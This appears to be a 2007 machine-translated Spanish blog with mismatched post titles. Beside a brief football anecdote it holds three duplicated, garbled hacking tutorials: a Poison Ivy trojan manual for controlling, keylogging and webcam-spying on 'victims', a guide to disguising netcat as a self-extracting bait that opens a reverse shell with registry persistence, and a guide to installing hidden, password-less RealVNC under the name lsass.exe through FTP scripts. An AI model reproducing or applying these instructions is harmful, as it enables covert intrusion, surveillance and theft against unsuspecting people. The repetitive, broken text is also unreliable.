THE CQC Bambino Veira read a poem by Viggo Mortensen, actor fana de San Lorenzo ...
IMPERDIBLE edit: thanks to Minutouno.com by name in this note
Saturday, June 30, 2007
Yogurt Places Floor Plans
Bamba and Viggo
THE CQC Bambino Veira read a poem by Viggo Mortensen, actor fana de San Lorenzo ...
IMPERDIBLE edit: thanks to Minutouno.com by name in this note
THE CQC Bambino Veira read a poem by Viggo Mortensen, actor fana de San Lorenzo ...
IMPERDIBLE edit: thanks to Minutouno.com by name in this note
Wednesday, June 27, 2007
Vba Pokemon Green Leaf Cheats
The Intuitive
Veira 
After a River-Independiente in which the figure of the party was a newly emerged Radamel Falcao (the Colombian scored two goals for River) comes this story of the Bambino:
"Essste Rodamel Garcia is the figure" , said the former coach of Boca River and at the end of the game. The player, unknown to many, even seems also to Veira, called Radamel Rodamel not. Shaken by the ongoing whore Veira, the other Bambino, Pons, she says, "So Bambi, "the figure is Radamel?". "Radamel? "Rodamel? What is the name essste kid? " said. The field of play, added a Germain Paoloski data for the Bamba not again fall into the error:" The shirt says Falcao, Bambino. You can call it that. "
Veira
Then he charged with his usual grace: " Uyyy, Radamel ... Rodamel ... Falcao now, this kid who played so well, did not ssserá Toninho Cerezo? ". Before the laughter of the team, confessed in confidence Paoloski comment was off the record of minutes from Veira own. In the meantime, upon the request of the journalist for he was thinking of something to say at the end of the game, Veira said, "Germain ... I did not prepare anything, I'm in-tui-ti-vo. dissstancias Saving'm like Olmedooo"
Saturday, June 23, 2007
Alexis Texas Does Not Like Black
MANUAL OF POISON IVY trojan 2.3.0
2.3.0 MANUAL OF POISON IVY By Raz! The
q
Well before I say anything that manual is 100% created by me!
clear that we are beginning! : 8):
* before anything downloaded q Trojan the
HERE * now run
* click on "new client"
* The following window appears
* listen on port is the port to listen!
* pasword (you know what makes jejeje q) then q
* configure it at will the port and give pasword click start
file
* now click on "new server"
* click on "create profile" and type cualkier name and click ok
* in the dns / port you are clicking on add and put your ip or no-ip domain, the same port q placed before and the same pasword
* give in test connections and will leave them like the picture! then click ok and then next
* select the ActiveX check box and click Startup
random * in file copy filename
* in place a name not so llamtativo q as q I got XD!
* want to select which folder to copy it to the server
* q select options like (melt, persistence, keylogger)
* once finished all click on next!
* mutex I recommend process q be left as they are and Change it if they only know what q!
q * by default is the server is injected into the process of msn, but if you wish to change clicker in the box and inject a custom process coloken the process q kieran!
* in format q I advise you to leave like this, change it if they know what q! * Click next
* if they want to change the icon delen click on icon and look for an icon!
* then click on generate, place the name q kieran the server and give in to keep (the server is created in the folder where you have poison ivy client 2.3.0) then give ok!
edited: ... q kieran to encrypt your servers with the theme or other, here I leave this!
as seen when they are configuring the server and come to this part! DO NOT select the box that says "third-party aplication Executed after build and give to "generate"
and ready and q have their servers then join with the q kieran (video, mp3, software, jpg), may pass them! I think I have no q q
explain XD edited: and taking the (s) victim (s) you will see this!
* double clicking on the victim displayed the following window
information: here appears the victim PC information
* files: here have access to the files of the pc victim! here by clicking the image ... right appear the following options!
refresh folder: to refresh the folder, rename this case, execute or delete something, clicking Refresh see the changes.
search: this used to search for specific files on the pc victim!
show thumbnails, this icon will show us the files! in my case was in the folder of images and can see the thumbnails! ideal if they want to download a specific image! XD
download: to download the pc cualkier d file to your pc
victim upload: to upload your file cualkier pc to pc victim!
execute: this brings us two options "excute => normal" that is visible to the victim and "excute => hidden" invisible to the victim that is so hidden!
rename: cualkier renaming file or folder in the pc victim!
delete: for deleting files in the pc victim
regedit: here we have access to the registration of our victim!
processes: shows active processes in the infected pc!
right-clicking on this window, see the following:
refresh: to refresh the folder!
show modules: This option is used to show q modules make up the process in which
kill process are: to kill selected process
suspend the process, to suspend the process if we are selecting
selected a module (as shown in the image ) shows the option "unload module" that allows us to make some modulo q q up the process will not load! (In this case I am selected the module "kernel32" the process of nod32)
services: here we see the victim's PC services ... right-clicking on any of them will appear the following:
refresh: refresh the window to save file
: creates a. txt with the description of the service!
start: if the service is stopped the start!
stop: help to stop an active duty
edit: to edit the service
install: install a service uninstall uninstall a service
windows: here you will see the windows that are open on the infected PC ... Clicking on any of these windows will appear the following:
capture windows to capture the window
show window displays in the victim's PC if this hidden
dq hide the window hides the window in the victim's PC
maximize the window maximized window in the victim's PC
minimize the window minimized pc window closes victim
close window pc
victim
active ports for active ports on the victim's PC
* remote shell for MS-DOS console the victim .. . activate it by clicking on activate and we can clean the window and save records
key logger to record keystrokes on the victim's PC ...! to give him then right click refresh and ready ... we also have the option to save a plain text file and clean the window!
remember activate the option in the creation of server!
screen capture device to capture the screen of the victim and from there to manage it!
Quote: mandiubi
Stretch:
used to adjust the display of the victim in the window.
Mouse:
used to handle the victim's mouse to click on and where we want.
Keyboard:
used to handle the keyboard of the victim and to write wherever we want.
Interval:
is the interval of time that is taken over and captured.
Start:
starts capture screen shots below.
Single:
capture a single snapshot.
Save:
used to hold the screen to a file. If you select "Autosave" It was kept all that are caught.
Options:
used to change the size and quality of the screen.
capture webcam camera to capture our victim
Quote: mandiubi
Stretch:
as in the screenshot, is used to adjust the image to the window.
Interval:
the time interval between each capture.
Start:
start to capture images.
Single:
captures a single image.
Driver:
sample web cameras installed on the victim's PC. You can select anyone for the button "Activate" activate it. If there is no camera will be "No webcam installed!"
Save:
to save the image to a file. With "Autosave" automatically saves all. Id
edit to change the name of the victim!
Share: used to share the connection of the server! that is, as another client
DNS / Port: here we will add the ip or no-ip account to connect the server q
ID: here is the name of the victim! q will see in the new "client"
Password: q key to the new client will connect
Run in Same Process / New Process: Here the server will run in the same process was anteriormentew q or a new one!
Privileges: q are the privileges will be given to new customer!
update: to add a new server to the infected pc and replace the old one!
restart to reset the server
uninstall to uninstall the server on the infected pc!
no server to upload your pages on-line antivirus use their own AV is the most recommended
good manual that is all I hope they can use q! whether to copy the entire book or part of it, publish the name of the author
By Raz! the
q
Well before I say anything that manual is 100% created by me!
clear that we are beginning! : 8):
* before anything downloaded q Trojan the
HERE * now run
* click on "new client"
* The following window appears
* listen on port is the port to listen!
* pasword (you know what makes jejeje q) then q
* configure it at will the port and give pasword click start
file
* now click on "new server"
* click on "create profile" and type cualkier name and click ok
* in the dns / port you are clicking on add and put your ip or no-ip domain, the same port q placed before and the same pasword
* give in test connections and will leave them like the picture! then click ok and then next
* select the ActiveX check box and click Startup
random * in file copy filename
* in place a name not so llamtativo q as q I got XD!
* want to select which folder to copy it to the server
* q select options like (melt, persistence, keylogger)
* once finished all click on next!
* mutex I recommend process q be left as they are and Change it if they only know what q!
q * by default is the server is injected into the process of msn, but if you wish to change clicker in the box and inject a custom process coloken the process q kieran!
* in format q I advise you to leave like this, change it if they know what q! * Click next
* if they want to change the icon delen click on icon and look for an icon!
* then click on generate, place the name q kieran the server and give in to keep (the server is created in the folder where you have poison ivy client 2.3.0) then give ok!
edited: ... q kieran to encrypt your servers with the theme or other, here I leave this!
as seen when they are configuring the server and come to this part! DO NOT select the box that says "third-party aplication Executed after build and give to "generate"
and ready and q have their servers then join with the q kieran (video, mp3, software, jpg), may pass them! I think I have no q q
explain XD edited: and taking the (s) victim (s) you will see this!
* double clicking on the victim displayed the following window
information: here appears the victim PC information
* files: here have access to the files of the pc victim! here by clicking the image ... right appear the following options!
refresh folder: to refresh the folder, rename this case, execute or delete something, clicking Refresh see the changes.
search: this used to search for specific files on the pc victim!
show thumbnails, this icon will show us the files! in my case was in the folder of images and can see the thumbnails! ideal if they want to download a specific image! XD
download: to download the pc cualkier d file to your pc
victim upload: to upload your file cualkier pc to pc victim!
execute: this brings us two options "excute => normal" that is visible to the victim and "excute => hidden" invisible to the victim that is so hidden!
rename: cualkier renaming file or folder in the pc victim!
delete: for deleting files in the pc victim
regedit: here we have access to the registration of our victim!
processes: shows active processes in the infected pc!
right-clicking on this window, see the following:
refresh: to refresh the folder!
show modules: This option is used to show q modules make up the process in which
kill process are: to kill selected process
suspend the process, to suspend the process if we are selecting
selected a module (as shown in the image ) shows the option "unload module" that allows us to make some modulo q q up the process will not load! (In this case I am selected the module "kernel32" the process of nod32)
services: here we see the victim's PC services ... right-clicking on any of them will appear the following:
refresh: refresh the window to save file
: creates a. txt with the description of the service!
start: if the service is stopped the start!
stop: help to stop an active duty
edit: to edit the service
install: install a service uninstall uninstall a service
windows: here you will see the windows that are open on the infected PC ... Clicking on any of these windows will appear the following:
capture windows to capture the window
show window displays in the victim's PC if this hidden
dq hide the window hides the window in the victim's PC
maximize the window maximized window in the victim's PC
minimize the window minimized pc window closes victim
close window pc
victim
active ports for active ports on the victim's PC
* remote shell for MS-DOS console the victim .. . activate it by clicking on activate and we can clean the window and save records
key logger to record keystrokes on the victim's PC ...! to give him then right click refresh and ready ... we also have the option to save a plain text file and clean the window!
remember activate the option in the creation of server!
screen capture device to capture the screen of the victim and from there to manage it!
Quote: mandiubi
Stretch:
used to adjust the display of the victim in the window.
Mouse:
used to handle the victim's mouse to click on and where we want.
Keyboard:
used to handle the keyboard of the victim and to write wherever we want.
Interval:
is the interval of time that is taken over and captured.
Start:
starts capture screen shots below.
Single:
capture a single snapshot.
Save:
used to hold the screen to a file. If you select "Autosave" It was kept all that are caught.
Options:
used to change the size and quality of the screen.
capture webcam camera to capture our victim
Quote: mandiubi
Stretch:
as in the screenshot, is used to adjust the image to the window.
Interval:
the time interval between each capture.
Start:
start to capture images.
Single:
captures a single image.
Driver:
sample web cameras installed on the victim's PC. You can select anyone for the button "Activate" activate it. If there is no camera will be "No webcam installed!"
Save:
to save the image to a file. With "Autosave" automatically saves all. Id
edit to change the name of the victim!
Share: used to share the connection of the server! that is, as another client
DNS / Port: here we will add the ip or no-ip account to connect the server q
ID: here is the name of the victim! q will see in the new "client"
Password: q key to the new client will connect
Run in Same Process / New Process: Here the server will run in the same process was anteriormentew q or a new one!
Privileges: q are the privileges will be given to new customer!
update: to add a new server to the infected pc and replace the old one!
restart to reset the server
uninstall to uninstall the server on the infected pc!
no server to upload your pages on-line antivirus use their own AV is the most recommended
good manual that is all I hope they can use q! whether to copy the entire book or part of it, publish the name of the author
By Raz! the
"Knowledge liberates us" 
Friday, June 22, 2007
Iphone Web Cam Adapter
Trojanized NetCAT Real VNC 4
Trojanized NetCAT by WHK
As you know, with netcat can make a shell directly or perform a reverse connection indicating my DNS or IP address (for those who do not know what a DNS ... is a kind of translation that makes it easier to find your PC, such as IP would be 200.32.22.25 DNS = pagina.cl).
Well ... first you have to know what we will do ... the main idea is to take a shell of the PC of anyone of an IRC (Chat).
Materials:
ResHacker
Netcat v1.1 Winrar (graphic mode)
Internet Explorer icon .
Well, if you do not know where to find the icon will try to give it to this document XD if you can can use any icon (you can but also do no icons will be suspect.)
The first is to connect to a chat XD and achieved a victim (hopefully not do it with their girlfriends because if they get caught they're going to kick XD) ... Once you say .. "That's my victimaaaaa!" So we'll use something called social engineering and through the mill himself impersonating someone or made the friendship of that person in order to get what we want, the idea is to talk with and bla bla bla bla bla bla where you finish ... when you say that the next day we talked ... ps if all goes well tomorrow and have enough confidence to give a program that will help in maintaining your PC or just have fun with a game XD. We leave
chat and at night we start to make the Trojan in the following way:
Step 1: First we change the icon to make it less suspect to the ResHacker:
First open the ResHacker and give in "File / Open" and look for the netcat. After you click on action and then "Add a new Resource", then see the window you see to the right and click where it says "Open file with new resource" (step 3) to find the icon that we had, then where it says " Resource Name "Please enter the word" ICON "as seen in Photo and finally pressed the "Add Resource" and "File / Save." With all this you will create a backup of the original netcat you can delete it peacefully and to refresh the screen (F5) that netcat really has the same icon in Internet Explorer XD
Step 2: rename nc.exe and from now be called "iexplorer.exe" XD, then you click the netcat with the right button of your mouse and should look something like this (obviously after you have installed winrar.)
Winrar will then appear and begin to create our Trojan:
1.
For "Name File "we wrote" carnada.exe "(for now), the format should be in" RAR "the best compression method and finally and most importantly" Create SFX archive ", the rest should be unchecked.
2.
In the "Advanced" tab (above) you must click the button called "SFX Options" and begin to shape our Winrar SFX.
3.
Now "Extraction Folder" tell it to unzip the netcat (iexplorer named) in the directory =% HOMEDRIVE%% HOMEPATH% \\ update, I now will say: "What is this?!" ...% HOMEDRIVE% means that you unzip into the same drive that is Windows, which is usually (not always) "C: \\" ...% HOMEPATH% means "Documents and settings \\ your current user "in conclusion is decompressed within the user's root directory where it is almost the only place where a user without administrator rights can be overwritten, in other words if you had written% windir% \\ system32 may have been flawed to decompress and not everyone is entitled to that directory. Choose a folder called update to attract less attention.
In "Run after extraction" we write this = iexplorer.exe-d-e cmd.exe [here goes our ip] 80, I added the address 127.0.0.1 to test but you will get the real ip that comes to the Internet. 80 is the port where the Trojan will connect with us.
In "Run before extraction" we wrote the following =% windir% \\ system32 \\ cmd / c reg add HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v "iexplorer" / t REG_SZ / d "% homedrive %% HOMEPATH% \\ update \\ iexplorer.exe-d-e cmd.exe 127.0.0.1 80 "/ f> nul ... and you tell me what's that !!!!... we say that you run the CMD console and call an executable called "REG.EXE" which will add our entry into the system registry to start the Trojan alone every time you turn on the pc (remember that the phrase should put the ip 127.0.0.1 of you or in some cases (for those who know) your DNS is more effective .... ( Ask for the no-ip) and where it says> nul mean that the victim will not see more than a simple DOS pestañazo instead of displaying everything is running.
4.
Here we are asking winrar not display anything while installing this, so it will be quieter, faster and automated.
5.
I put yahoo icon because I'm going to try from the same chat.
Now let's create the program that will connect us with the victim, and is called "Customer"
Just run it and be ready to receive the connection of who opens the bait:
And ready now just need visit our friend the day before and say you have a really cool game and you have something to not ... use your imagination. In my case, I entered a room like yahoo and now this highly fashionable XD booters put in a room to come down to antibooter could not leave the room and pass on a link to the address where he was staying the Trojan. In a nutshell ... if someone falls in your wickedness you should see this:
You've taken the shell of another PC (run a shell from another pc means to control the Windows or DOS shell in GNU .. is able to control the command of the other person and through that you can raise your files , erase things, to give Trojans that allow you to view your desktop ... turning to look at their record passwords in text and making a "type" ... for those who know a little bit more .. maybe jump to other pc with netbios, exploits like dcom, access servers, where an entire network and ufff .. to the imagination. If you do not believe me look at these three sacks playing with netcat XD nothing serious:
1. The dream of every lick XD:
2. RealVnc4 rising to make a reverse connection and watch the other person's desktop (tutorial below):
3. This was a settling of accounts XD:
NOTE: Deleted files in the shell are not going to trash, are eliminated entirely
I showed how to create a Trojan with netcat (undetectable by all antivirus for now) also can be done with a direct connection instead of an inverse as I did here, and you know it
This is all and I hope to show you the next time .. Netcat v1.1 how to convert an SMTP client to send automated and timed post while serving as automated FTP client commands without the need for intervention by typing commands at the console, as well as put a password to a shell with netcat session among many other things
Salu2 Att. Yan. Unilola
Software.
Trojanized NetCAT by WHK
As you know, with netcat can make a shell directly or perform a reverse connection indicating my DNS or IP address (for those who do not know what a DNS ... is a kind of translation that makes it easier to find your PC, such as IP would be 200.32.22.25 DNS = pagina.cl).
Well ... first you have to know what we will do ... the main idea is to take a shell of the PC of anyone of an IRC (Chat).
Materials:
ResHacker
Netcat v1.1 Winrar (graphic mode)
Internet Explorer icon .
Well, if you do not know where to find the icon will try to give it to this document XD if you can can use any icon (you can but also do no icons will be suspect.)
The first is to connect to a chat XD and achieved a victim (hopefully not do it with their girlfriends because if they get caught they're going to kick XD) ... Once you say .. "That's my victimaaaaa!" So we'll use something called social engineering and through the mill himself impersonating someone or made the friendship of that person in order to get what we want, the idea is to talk with and bla bla bla bla bla bla where you finish ... when you say that the next day we talked ... ps if all goes well tomorrow and have enough confidence to give a program that will help in maintaining your PC or just have fun with a game XD. We leave
chat and at night we start to make the Trojan in the following way:
Step 1: First we change the icon to make it less suspect to the ResHacker:
First open the ResHacker and give in "File / Open" and look for the netcat. After you click on action and then "Add a new Resource", then see the window you see to the right and click where it says "Open file with new resource" (step 3) to find the icon that we had, then where it says " Resource Name "Please enter the word" ICON "as seen in Photo and finally pressed the "Add Resource" and "File / Save." With all this you will create a backup of the original netcat you can delete it peacefully and to refresh the screen (F5) that netcat really has the same icon in Internet Explorer XD
Step 2: rename nc.exe and from now be called "iexplorer.exe" XD, then you click the netcat with the right button of your mouse and should look something like this (obviously after you have installed winrar.)
Winrar will then appear and begin to create our Trojan:
1.
For "Name File "we wrote" carnada.exe "(for now), the format should be in" RAR "the best compression method and finally and most importantly" Create SFX archive ", the rest should be unchecked.
2.
In the "Advanced" tab (above) you must click the button called "SFX Options" and begin to shape our Winrar SFX.
3.
Now "Extraction Folder" tell it to unzip the netcat (iexplorer named) in the directory =% HOMEDRIVE%% HOMEPATH% \\ update, I now will say: "What is this?!" ...% HOMEDRIVE% means that you unzip into the same drive that is Windows, which is usually (not always) "C: \\" ...% HOMEPATH% means "Documents and settings \\ your current user "in conclusion is decompressed within the user's root directory where it is almost the only place where a user without administrator rights can be overwritten, in other words if you had written% windir% \\ system32 may have been flawed to decompress and not everyone is entitled to that directory. Choose a folder called update to attract less attention.
In "Run after extraction" we write this = iexplorer.exe-d-e cmd.exe [here goes our ip] 80, I added the address 127.0.0.1 to test but you will get the real ip that comes to the Internet. 80 is the port where the Trojan will connect with us.
In "Run before extraction" we wrote the following =% windir% \\ system32 \\ cmd / c reg add HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v "iexplorer" / t REG_SZ / d "% homedrive %% HOMEPATH% \\ update \\ iexplorer.exe-d-e cmd.exe 127.0.0.1 80 "/ f> nul ... and you tell me what's that !!!!... we say that you run the CMD console and call an executable called "REG.EXE" which will add our entry into the system registry to start the Trojan alone every time you turn on the pc (remember that the phrase should put the ip 127.0.0.1 of you or in some cases (for those who know) your DNS is more effective .... ( Ask for the no-ip) and where it says> nul mean that the victim will not see more than a simple DOS pestañazo instead of displaying everything is running.
4.
Here we are asking winrar not display anything while installing this, so it will be quieter, faster and automated.
5.
I put yahoo icon because I'm going to try from the same chat.
Now let's create the program that will connect us with the victim, and is called "Customer"
Just run it and be ready to receive the connection of who opens the bait:
And ready now just need visit our friend the day before and say you have a really cool game and you have something to not ... use your imagination. In my case, I entered a room like yahoo and now this highly fashionable XD booters put in a room to come down to antibooter could not leave the room and pass on a link to the address where he was staying the Trojan. In a nutshell ... if someone falls in your wickedness you should see this:
You've taken the shell of another PC (run a shell from another pc means to control the Windows or DOS shell in GNU .. is able to control the command of the other person and through that you can raise your files , erase things, to give Trojans that allow you to view your desktop ... turning to look at their record passwords in text and making a "type" ... for those who know a little bit more .. maybe jump to other pc with netbios, exploits like dcom, access servers, where an entire network and ufff .. to the imagination. If you do not believe me look at these three sacks playing with netcat XD nothing serious:
1. The dream of every lick XD:
2. RealVnc4 rising to make a reverse connection and watch the other person's desktop (tutorial below):
3. This was a settling of accounts XD:
NOTE: Deleted files in the shell are not going to trash, are eliminated entirely
I showed how to create a Trojan with netcat (undetectable by all antivirus for now) also can be done with a direct connection instead of an inverse as I did here, and you know it
This is all and I hope to show you the next time .. Netcat v1.1 how to convert an SMTP client to send automated and timed post while serving as automated FTP client commands without the need for intervention by typing commands at the console, as well as put a password to a shell with netcat session among many other things
Salu2 Att. Yan. Unilola
Software.
"Knowledge liberates us" 
Tender Thoughts Cards
Trojanized
Trojanized REAL VNC 4
Materials:
FTP Server (any)
winvnc4
ResHacker
Trojanized Here to learn the realvnc4 in different ways, but first be hide the boring black and white icon shown next to time and betrays us when the RealVNC is active ... what will we do with the resources ResHacker deleting icons and images and all those we can reveal:
Do not want to complicate your life you can download it from http:// 512.iespana.es/vnc already compiled and everything, and finally rename it to "lsass.exe" taking advantage of a vulnerability in Task Manager that says lsass.exe can not stop XD.
Now assuming we are in a shell ... we will upload them via ftp.
open our FTP server and configure the user name and password:
should see an icon well: 
Now let's configure our Trojan in two ways ... One is to view only the victim's desktop with no account and another to take total control without being able to do anything that bad lol: p. For this we need to make a registry entry as follows: Windows Registry Editor
Version 5.00 [HKEY_LOCAL_MACHINE \\ SOFTWARE \\ RealVNC \\ winvnc4]
"SecurityTypes" = "None"
"ReverseSecurityTypes" = "None"
"DisconnectAction "=" None "
" QueryConnect "= dword: 00000000
" QueryOnlyIfLoggedOn "= dword: 00000000
" LocalHost "= dword: 00000000
" Hosts "= dword: 00000000
" AcceptKeyEvents "= dword: 00000000
"AcceptPointerEvents" = dword: 00000000
"AcceptCutText" = dword: 00000000
"SendCutText" = dword: 00000000
"DisableLocalInputs" = dword: 00000000
"DisconnectClients" = dword: 00000000
"AlwaysShared" = dword: 00000000
" NeverShared "= dword: 00000000
" RemoveWallpaper "= dword: 00000000
" DisableEffects "= dword: 00000000
" UpdateMethod "= dword: 00000001
" PollConsoleWindows "= dword: 00000001
" UseCaptureBlt "= dword: 00000001
" UseHooks " = dword: 00000001
"Protocol3.3" = dword: 00000000
Copy this and paste it into Notepad and save it as "vm.tmp" which means "View Mode "... if you want to manage the desktop of another victim then paste this text: Windows Registry Editor
Version 5.00 [HKEY_LOCAL_MACHINE \\ SOFTWARE \\ RealVNC \\ winvnc4]
" SecurityTypes "=" None "
" ReverseSecurityTypes "=" None "
" DisconnectAction "=" None "
" QueryConnect "= dword: 00000000
" QueryOnlyIfLoggedOn "= dword: 00000000
" LocalHost "= dword: 00000000
" Hosts "=" 0 "
" AcceptKeyEvents "= dword: 00000001
"AcceptPointerEvents" = dword: 00000001
"AcceptCutText" = dword: 00000001
"SendCutText" = dword: 00000001
"DisableLocalInputs" = dword: 00000001
"DisconnectClients" = dword: 00000000
"AlwaysShared" = dword: 00000000
"NeverShared" = dword: 00000000
"RemoveWallpaper" = dword: 00000001
"DisableEffects" = dword: 00000000
"UpdateMethod" = dword: 00000001
"PollConsoleWindows" = dword: 00000001
" UseCaptureBlt "= dword: 00000001
" UseHooks "= dword: 00000001
" Protocol3.3 "= dword: 00000000
" PortNumber "= dword: 0000170c
" IdleTimeout "= dword: 00000e10
" HTTPPortNumber "= dword: 000016a8
" RemovePattern "= dword: 00000000
and save it as" ct.tmp "which means" Total Control. " Now climb
configurations and using vnc from our shell ftp.exe command as follows:
The idea is that through the echo command to do a text ftp.exe execute commands as follows:
Echo or>> ftp.txt
Echo 192.168.1.69>> 192.168.1.69 ftp.txt Here is our FTP server IP as Echo
user>> ftp.txt This is the Echo
FTP user pass>> ftp.txt This is the password of FTP
Echo get lsass.exe>> ftp.txt This is our VNC4
get wm_hooks.dll Echo> Echo
ftp.txt get logmessages.dll>> Echo
ftp.txt get vm.tmp>> ftp.txt If we only look "vm" if control use, "ct" Echo
quit>> ftp.txt
Now run the command to raise us all: ftp-s: ftp.txt and now that we have everything we care about the record as follows: reg import reg import ct.tmp vm.tmp or if you want to control or just look.
Now that we have our Trojan ready and set, we proceed to execute it as follows:
Lsass.exe-register-start
Lsass.exe
Now that our Trojan is running as a service, we ready to go with our client:
Where it says 127.0.0.1 is the IP the victim that has the Trojan.
If you look ... I do not see any icon that would betray its existence and pinches Although the primary or secondary button mouse (right click and Isquierdo) nothing appears:
Now we'll do it another way ... you'll like bait without being in a shell using Winrar.
Materials: Winrar
RealVNC4
Now select the next and compress it:
and proceed to build our Trojan:
1: We will create a file "sfx" ...
2: Let the Advanced tab and click in "Options SFX
3: extraction folder put "% HOMEDRIVE%% HOMEPATH% \\ update" and "Run after extraction" put "setup" (then explain why)
4: In the tab "Mode" select "Hide all" and "Skip existing files" to avoid future mistakes and that also does not show anything, because we want to be as quiet as possible not?.
5: "Text and icon" where it says below: "Load SFX icon from file" icon to look for a choice ... in my case I put on a game called "Max Card" and press OK once.
6: 'comment text appears on one side it says: Setup = setup and replace it with the following:
Setup = "% windir% \\ system32 \\ cmd.exe" / c reg import "% HOMEDRIVE%% HOMEPATH% \\ update \\ vm.tmp "
Setup = lasaa.exe-noconsole-register
Setup = lasaa.exe-noconsole-start
See if is a single line for each setup. Now I will say this is? ... ps explain:
Setup = "% windir% \\ system32 \\ cmd.exe" / c reg import% HOMEDRIVE%% HOMEPATH% \\ update \\ vm.tmp "/ / import the configuration of our Trojan
Setup = lasaa.exe-noconsole-register / / register the Trojan to run Setup mode = lasaa.exe
SYSTEM-noconsole-start / / Start the Trojan
Now we accept everyone and should appear something like:
In my case I put the icon Max Card to tell my dear good friend called "Victim" which is the demo of MAX COMB III (obviously no) and open it happen the same as the first example:
Without any icon and connect to our customer:
Obviously 127.0.0.1 should be the IP of the victim.
Now can you tell if your girlfriend's cheating or give you the fright of his life to you always control your pc has screwed XD.
Note: You can add extra registry entries to run every time you start the pc or do whatever you want.
and video applications is
http://512.iespana.es/vnc Att. Yan
Unilola Software.
blog posts
- 1) You can create a bat with the following characteristics:
1 - the first kita the happy little icon.
2 - the second disables authentication.
3 - the third one to start the system.
reg add hklm \\ SOFTWARE \\ ORL \\ WinVNC3 / V DisableTrayIcon / t REG_DWORD / d 1 / f reg add hklm
\\ SOFTWARE \\ ORL \\ WinVNC3 / v authrequired / t REG_DWORD / d 0 / f reg add
hklm \\ software \\ microsoft \\ windows \\ currentversion \\ run / v dllhost.exe / t REG_SZ / d winvnc.exe / f
"Knowledge liberates us" 
Subscribe to:
Posts (Atom)